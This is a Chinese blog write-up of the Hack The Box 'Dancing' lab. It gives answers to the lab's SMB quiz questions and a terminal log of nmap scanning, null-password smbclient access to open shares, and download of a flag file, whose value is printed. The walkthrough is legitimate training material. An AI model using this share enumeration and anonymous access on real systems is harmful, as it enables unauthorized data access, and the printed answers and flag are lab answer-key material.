HTB之Dancing
涂寐 Lv5
  2023-03-13 11:07:57 2023-03-13 11:07   2023-10-08 22:46:07    

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

TASK 1

  • 问:SMB这三个字母的缩写代表什么?
  • 答:Server Message Block

image

TASK 2

  • 问:中小企业使用哪个端口运行?
  • 答:445

image

TASK 3

  • 问:我们的Nmap扫描中出现的端口445的服务名称是什么?
  • 答:microsoft-ds

image

TASK 4

  • 问:我们可以使用SMB工具来“列出”共享内容的“标志”或“开关”是什么?
  • 答:-L

image

TASK 5

  • 问:Dancing 有多少共享?
  • 答:4

image

TASK 6

  • 问:我们最终可以使用空密码访问的共享的名称是什么?
  • 答:WorkShares

image

TASK 7

  • 问:我们可以在SMB shell中使用什么命令来下载我们找到的文件?
  • 答:get

image

SUBMIT FLAG

  • 问:Submit root flag
  • 答:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
# P.S.
kali@kali:~/Test$ nmap -T4 -sV -sC -Pn 10.129.236.182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-24 16:01 CST
Nmap scan report for 10.129.236.182
Host is up (0.56s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-02-24T12:03:22
|_  start_date: N/A
|_clock-skew: 3h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.21 seconds
# P.S.smbclient 类似ftp的客户端,访问服务器上的SMB/CIFS资源
kali@kali:~/Test$ whatis smbclient 
smbclient (1)        - ftp-like client to access SMB/CIFS resources on servers
# P.S.smbclient -L 获取指定主机上可用的共享列表
kali@kali:~/Test$ smbclient -L10.129.236.182
Password for [WORKGROUP\kali]:

  Sharename       Type      Comment
  ---------       ----      -------
  ADMIN$          Disk      Remote Admin
  C$              Disk      Default share
  IPC$            IPC       Remote IPC
  WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.236.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
# P.S.尝试空密码访问共享目录
kali@kali:~/Test$ smbclient //10.129.236.182/ADMIN$
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
# P.S.尝试空密码访问共享目录
kali@kali:~/Test$ smbclient //10.129.236.182/C$
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
# P.S.尝试空密码访问共享目录,可以,但内容不符
kali@kali:~/Test$ smbclient //10.129.236.182/IPC$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
# P.S.退出当前连接的共享
smb: \> exit
# P.S.尝试空密码访问共享目录
kali@kali:~/Test$ smbclient //10.129.236.182/WorkShares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
# P.S.列文件
smb: \> ls
  .                                   D        0  Mon Mar 29 16:22:01 2021
  ..                                  D        0  Mon Mar 29 16:22:01 2021
  Amy.J                               D        0  Mon Mar 29 17:08:24 2021
  James.P                             D        0  Thu Jun  3 16:38:03 2021

    5114111 blocks of size 4096. 1751387 blocks available
# P.S.切目录
smb: \> cd Amy.J
# P.S.列文件
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 17:08:24 2021
  ..                                  D        0  Mon Mar 29 17:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 19:00:37 2021

    5114111 blocks of size 4096. 1751372 blocks available
# P.S.习惯性查看,无效
smb: \Amy.J\> cat worknotes.txt
cat: command not found
# P.S.拉取共享目录文件到本地
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
# P.S.切目录
smb: \Amy.J\> cd ../James.P
# P.S.列文件
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 16:38:03 2021
  ..                                  D        0  Thu Jun  3 16:38:03 2021
  flag.txt                            A       32  Mon Mar 29 17:26:57 2021

    5114111 blocks of size 4096. 1751369 blocks available
# P.S.这个看起来比较像,继续拉取
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
# P.S.退出连接
mb: \James.P\> exit
# P.S.列本地目录
kali@kali:~/Test$ ls
flag.txt  starting_point_iIl1o0O.ovpn  worknotes.txt
# P.S.查看拉取到本地的 flag.txt
kali@kali:~/Test$ cat flag.txt 
5f61c10dffbc77a704d76016a22f1664

image

  • P.S.nmap 扫描,开放 445 端口,SMB 服务,smbclient 工具查看共享目录,尝试空密码连接共享目录,逐一查看共享目录文件。
  • 本文标题HTB之Dancing
  • 本文作者涂寐
  • 创建时间2023-03-13 11:07:57
  • 本文链接article/9eefd971.html
  • 版权声明本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
 评论
  1. 1. TASK 1
  2. 2. TASK 2
  3. 3. TASK 3
  4. 4. TASK 4
  5. 5. TASK 5
  6. 6. TASK 6
  7. 7. TASK 7
  8. 8. SUBMIT FLAG